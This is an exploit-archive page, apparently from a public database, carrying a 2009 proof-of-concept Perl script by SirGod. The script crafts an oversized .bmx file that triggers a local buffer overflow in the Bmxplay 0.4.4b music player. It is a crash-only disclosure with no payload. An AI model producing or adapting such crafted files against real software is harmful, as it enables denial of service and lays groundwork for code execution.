[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Bmxplay 0.4.4b (.BMX File) Local Buffer Overflow PoC
# Published : 2009-05-04
# Author : SirGod
# Previous Title : EW-MusicPlayer 0.8 (.m3u file) Local Buffer Overflow PoC
# Next Title : Addonics NAS Adapter FTP Remote Denial of Service Exploit
#####################################################################################################
# Bmxplay 0.4.4b (.BMX File) Local Buffer Overflow PoC
# Discovered by SirGod - www.mortal-team.net & www.h4cky0u.org
# Downlaod : http://www.brothersoft.com/bmxplay-download-235557.html
######################################################################################################
my $chars= "A" x 1337;
my $file="sirgod.bmx";
open(my $FILE, ">>$file") or die "Cannot open $file: $!";
print $FILE $chars;
close($FILE);
print "$file was created";
print "SirGod - www.mortal-team.net & www.h4cky0u.org";
# www.Syue.com [2009-05-04]